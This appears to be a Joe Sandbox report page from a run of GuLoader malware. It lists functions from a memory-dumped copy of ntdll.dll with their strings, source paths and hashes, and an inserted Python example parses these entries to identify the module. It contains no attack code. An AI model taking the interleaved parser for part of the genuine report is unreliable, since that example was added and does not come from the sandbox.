                                                  • Opcode ID: 5ce2bbbf85c9e1f147a9b1b76a04f9e6cdce937e22ff069db011fe7068b31f37
                                                  • Instruction ID: d61bf7fbedea8c3e2a50f319fa497392ce0439f85ab65cb964a1b4ace684c04e
                                                  • Opcode Fuzzy Hash: 5ce2bbbf85c9e1f147a9b1b76a04f9e6cdce937e22ff069db011fe7068b31f37
                                                  • Instruction Fuzzy Hash: 3A900475755500030305F5DC4704D07004747D5351355C033F7015734CD731CD755131
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd

                                                  Control-flow Graph
                                                  (rendered graph not reproduced; function starting at 36d92890, with internal calls to 36da0050; nodes were marked Executed / Not Executed)
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105

                                                  Control-flow Graph
                                                  (rendered graph not reproduced; function starting at 36e02410, with internal calls to 36da0510; nodes were marked Executed / Not Executed)
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105

                                                  Control-flow Graph
                                                  (rendered graph not reproduced; function starting at 36e2a670, calling RtlDebugPrintTimes and the internal subroutines 36d62410, 36d625b0 and 36d94c30; nodes were marked Executed / Not Executed)
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122

                                                  Control-flow Graph
                                                  (rendered graph not reproduced; function starting at 36d87630, calling RtlDebugPrintTimes and BaseQueryModuleData plus internal subroutines; nodes were marked Executed / Not Executed)
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36DC4742
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36DC4725
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 36DC4787
                                                  • Execute=1, xrefs: 36DC4713
                                                  • ExecuteOptions, xrefs: 36DC46A0
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36DC4655
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36DC46FC
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  Strings
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB79FA
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB79D5
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36DB7AE6
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DB79D0, 36DB79F5
                                                  • Actx , xrefs: 36DB7A0C, 36DB7A73
                                                  • SsHd, xrefs: 36D6A3E4
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: d8db947e479ec80ce24254e74fb7f8942329f951b825ff7eb8663359aef6e2b0
                                                  • Instruction ID: 5f250435902a5300cc4c1adf9f9a888f6f32a2decf187af3ae937023c23650fc
                                                  • Opcode Fuzzy Hash: d8db947e479ec80ce24254e74fb7f8942329f951b825ff7eb8663359aef6e2b0
                                                  • Instruction Fuzzy Hash: 7CE1A374B043018FE714CF66C894B5AB7E1BB8835CF98462DE8D68B290DBB1E945CB91
                                                  Strings
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB936B
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36DB9346
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36DB9565
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 36DB9341, 36DB9366
                                                  • Actx , xrefs: 36DB9508
                                                  • GsHd, xrefs: 36D6D874
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 276ffd0fa8cac2f7573df99e1f1d955ec9c386cbde018f7a0be84463975993fa
                                                  • Instruction ID: 723ccd52425edf390f2d9635435b4f08e15b6068ab2420ffc2305f8ab98c5068
                                                  • Opcode Fuzzy Hash: 276ffd0fa8cac2f7573df99e1f1d955ec9c386cbde018f7a0be84463975993fa
                                                  • Instruction Fuzzy Hash: 10E1E574A043418FEB10CF26C890B5AB7F4BF8935CF94492EE896DB299C771D844CB92
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 36D4656C
                                                    • Part of subcall function 36D465B5: RtlDebugPrintTimes.NTDLL ref: 36D46664
                                                    • Part of subcall function 36D465B5: RtlDebugPrintTimes.NTDLL ref: 36D466AF
                                                  Strings
                                                  • LdrpInitShimEngine, xrefs: 36DA99F4, 36DA9A07, 36DA9A30
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DA9A11, 36DA9A3A
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36DA99ED
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36DA9A01
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36DA9A2A
                                                  • apphelp.dll, xrefs: 36D46496
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  • Opcode ID: bb30c4f7aa16bab1dda22d8991e7460f298a4cb57db32d53c09d66ab7215498c
                                                  • Instruction ID: 4e56edbdf32ae814e181b05bec95e55edfc444350b02fa0634f1dd6583abcffd
                                                  • Opcode Fuzzy Hash: bb30c4f7aa16bab1dda22d8991e7460f298a4cb57db32d53c09d66ab7215498c
                                                  • Instruction Fuzzy Hash: 3C519E71A19344EFE311DF25CC40E5B77E5EB84648F50491AF596AB1A0DA30DD09CBA3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: bf01e085fddb3a232fcb4b5e8fc8183006f70fd8e3358da254d96daba867378f
                                                  • Instruction ID: 49377f83d96498aa0d30f1ac2d91960bdcf35b548e44e093145f58b4e0ec93e6
                                                  • Opcode Fuzzy Hash: bf01e085fddb3a232fcb4b5e8fc8183006f70fd8e3358da254d96daba867378f
                                                  • Instruction Fuzzy Hash: BD415FB9E0120DABDB01DFAAC980ADEBBB9FF48354F114159E904BB345D731D915CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: feed57dbac3dad4e0aa5bd2fd48d8b021cbda8bcaad1c7094455b10993cc7361
                                                  • Instruction ID: 7aea8bfe0e248cc972f664bb37e4cc07a5c803f1942e8388a24af43e417ef9cf
                                                  • Opcode Fuzzy Hash: feed57dbac3dad4e0aa5bd2fd48d8b021cbda8bcaad1c7094455b10993cc7361
                                                  • Instruction Fuzzy Hash: 6F712271A25244EFDB02DFA9C8406ADFBF2FF49304F458049E544AF691CB36994ACFA0
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DA9AC5, 36DA9B06
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DA9AF6
                                                  • LdrpLoadShimEngine, xrefs: 36DA9ABB, 36DA9AFC
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DA9AB4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: 94241924372233fb8cb26e75e23d99c699a8e1b1b1e745888c8c6d4831dd1082
                                                  • Instruction ID: 271052b469bba1ec422757d7588b89028209b8bbe0535177f86918f85a13a4af
                                                  • Opcode Fuzzy Hash: 94241924372233fb8cb26e75e23d99c699a8e1b1b1e745888c8c6d4831dd1082
                                                  • Instruction Fuzzy Hash: 8A512332E153989FDB06EF79CC48A9D7BB2AB40304F100165E652BF285CB649C5ACBA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: @36$LdrpUnloadNode$Unmapping DLL "%wZ"$df6@36@36$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-1025258580
                                                  • Opcode ID: 51810eff3827133ea074061a15cc34f27f56a6e888a11c1bffca12befe873bd0
                                                  • Instruction ID: 95394d4f2044d42f8568e26cf463ed9cf6cc17634b4d4454526f3a5db190ff5a
                                                  • Opcode Fuzzy Hash: 51810eff3827133ea074061a15cc34f27f56a6e888a11c1bffca12befe873bd0
                                                  • Instruction Fuzzy Hash: 6B513772A043029FE715DF35CC84B19BBA1BF94318F54066DE5969F294DB34E805CBA3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 7ea4361ab83214351ae6196d448c9c3694b8693759c48291e8bc06994e38ae92
                                                  • Instruction ID: 2b43a872a8cf7f3ea1d797a4cfd7351c8fb0e7411b80def82f9c15a2342701fc
                                                  • Opcode Fuzzy Hash: 7ea4361ab83214351ae6196d448c9c3694b8693759c48291e8bc06994e38ae92
                                                  • Instruction Fuzzy Hash: E9413875E10750EFEB12CF74C884B59B7B4EF45368F108169D8465B694CB38A885CBE2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: e223e39aefad7073db3a532857dabb0c0b9ec55e8f5ce1c2a3e8d2999bc0903f
                                                  • Instruction ID: 998a21b017a41013d2db49a61f3a3c64ca3ec9267528e86f8ba4b3edd62d5b91
                                                  • Opcode Fuzzy Hash: e223e39aefad7073db3a532857dabb0c0b9ec55e8f5ce1c2a3e8d2999bc0903f
                                                  • Instruction Fuzzy Hash: 8D312535915780EFEB22DB64C808F467BF8EF11754F044084E4425BA95CBB8E889CAA3
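                                                   The per-function entries on this page are machine-generated: each "String ID" field is the function's referenced strings joined with "$", and the "minkernel\ntdll\*.c" source paths together with the Rtl*/Ldrp* names are what tell an analyst that the dumped image at 0x36D20000 in process 5 is a copy of ntdll.dll rather than GuLoader's own code. The Python below is an added example, not part of the Joe Sandbox report: it parses entries in this plain-text layout and attributes the dump to a module from those strings. The sample entries are copied from this page with hashes abridged; the list of name prefixes used to recognise ntdll-style internal functions is an assumption.

```python
import re
from collections import Counter

# Constructed sample: three "Similarity" entries in the plain-text layout of
# the report above (fields copied from this page, some hashes omitted).
SAMPLE = r"""
Similarity
• API ID: DebugPrintTimes
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-204845295
• Instruction Fuzzy Hash: 3C519E71A19344EFE311DF25CC40E5B77E5EB84648F50491AF596AB1A0DA30DD09CBA3
Similarity
• API ID:
• String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SsHd
• API String ID: 0-1988757188
• Instruction Fuzzy Hash: 7CE1A374B043018FE714CF66C894B5AB7E1BB8835CF98462DE8D68B290DBB1E945CB91
Similarity
• API ID: DebugPrintTimes
• String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
• API String ID: 3446177414-3492000579
• Instruction Fuzzy Hash: 6F712271A25244EFDB02DFA9C8406ADFBF2FF49304F458049E544AF691CB36994ACFA0
"""

# One bullet field per line; only the fields we need are captured.
FIELD_RE = re.compile(
    r"^\s*•\s*(API ID|String ID|API String ID|Instruction Fuzzy Hash):\s?(.*)$")
# Windows source paths as they appear in ntdll debug strings.
SRC_RE = re.compile(r"^minkernel\\[\w\\]+\.c$")
# Assumed prefixes of ntdll-style internal function names (not from the report).
FUNC_RE = re.compile(r"^(Rtl|Ldr|Nt|Zw)\w+$")


def parse_entries(text):
    """Split the report text into one dict per 'Similarity' entry."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            cur = {}
            entries.append(cur)
            continue
        m = FIELD_RE.match(line)
        if m and cur is not None:
            key, val = m.group(1), m.group(2).rstrip()
            if key == "String ID":
                # '$' is the report's separator. A literal '$' inside a string
                # cannot be told apart from it, so empty pieces are dropped.
                val = [s for s in val.split("$") if s.strip()]
            cur[key] = val
    return entries


def attribute_module(entries):
    """Tally source paths, internal names and API IDs; name the module if clear."""
    sources, apis, funcs = Counter(), Counter(), set()
    for e in entries:
        apis[e.get("API ID") or "<none>"] += 1
        for s in e.get("String ID", []):
            s = s.strip()
            if SRC_RE.match(s):
                sources[s] += 1
            elif FUNC_RE.match(s):
                funcs.add(s)
    module = None
    if any(p.startswith("minkernel\\ntdll\\") for p in sources):
        module = "ntdll.dll"
    return {
        "module": module,
        "sources": dict(sources),
        "functions": sorted(funcs),
        "apis": dict(apis),
    }


if __name__ == "__main__":
    print(attribute_module(parse_entries(SAMPLE)))
```

                                                   The attribution relies only on strings the report already extracted, so it runs offline; the same parser can be pointed at the full page to list every function that carries an xref into the 36D20000 image.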
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction ID: 7f1bc733c1f47465e1c0e669870ef44dd65e63108c3d2038d95ae9ca7d724f91
                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                  • Instruction Fuzzy Hash: 940226B5508341AFD705DF29C890A6BBBF6EFC8744F508A2DF9884B254DB31E909CB52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction ID: be6e872b9fd9022423467a4923606dba5a1d8d3c1635ba4a8a81cb8447c2a142
                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction Fuzzy Hash: D981D578E153599EEF04CF69C8917EFBBF1AF45354F564219D850AB2D0C7349840CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@
                                                  • API String ID: 3446177414-1194432280
                                                  • Opcode ID: 8567c2df96f1940e1e89c2e3744ff33ac31ee4d06c5b50ff96e0e3da01ba95cb
                                                  • Instruction ID: bc0cfc72d73c1b402cdad241f9db55e69694c71f6616fb63d6cef603135b14a9
                                                  • Opcode Fuzzy Hash: 8567c2df96f1940e1e89c2e3744ff33ac31ee4d06c5b50ff96e0e3da01ba95cb
                                                  • Instruction Fuzzy Hash: B4816DB6D002699BDB21CF54CC44BEEB7B8AF08754F0141DAEA0AB7640D7309E85CFA5
                                                  Strings
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 36DC3640, 36DC366C
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36DC362F
                                                  • LdrpFindDllActivationContext, xrefs: 36DC3636, 36DC3662
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 36DC365C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: 0a74f0da8f9e477f1905e1c0c6b80101bcc08b1c0fd815af4c9fcf474cdc363f
                                                  • Instruction ID: b78a2ef0c288b377c31eadde34b5e26ee9d4954356961fd3f03dee9de5294675
                                                  • Opcode Fuzzy Hash: 0a74f0da8f9e477f1905e1c0c6b80101bcc08b1c0fd815af4c9fcf474cdc363f
                                                  • Instruction Fuzzy Hash: 93319BB6D00711EEFB12DB15C88CB2A77B4BB81398F57806AE94463650DBA0DC85C7F1
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DBA9A2
                                                  • LdrpDynamicShimModule, xrefs: 36DBA998
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36DBA992
                                                  • apphelp.dll, xrefs: 36D72462
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  • Opcode ID: 5c3e4a86324ff31da7923cca0ab04cd23d4bf155024a29361b9e25154715880f
                                                  • Instruction ID: 8de9ae248fd0d3eb169ae4c7a9a010ed4c4941d9555546426c142f345cd5483a
                                                  • Opcode Fuzzy Hash: 5c3e4a86324ff31da7923cca0ab04cd23d4bf155024a29361b9e25154715880f
                                                  • Instruction Fuzzy Hash: 5B312875A01301EBEB129F6AC844E5ABBB5FB88744FA60059E601B7244CBB0984BDB91
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                   • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  • Opcode ID: 5e6e0469e92b93f686860aabead349d3df600bd04682ab384d8269f21f6afd5a
                                                  • Instruction ID: 13f7b4af884751e8652b2bef7cbc29c92c7392466859ac3827a00073b872e3c4
                                                  • Opcode Fuzzy Hash: 5e6e0469e92b93f686860aabead349d3df600bd04682ab384d8269f21f6afd5a
                                                  • Instruction Fuzzy Hash: AF2162BAE10219AFDB01DF7ADC40AEE7BF8EF54684F440116E905E3200EB31D909CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  • Opcode ID: 7656fd30214d9996bdb506b0ec2734c5f8b7123ef11dc9584fa96c34008055f6
                                                  • Instruction ID: 03de21bd93f5370ca2d2af497cb2ed91a5bc38ec208910d58bbdf5e768aada31
                                                  • Opcode Fuzzy Hash: 7656fd30214d9996bdb506b0ec2734c5f8b7123ef11dc9584fa96c34008055f6
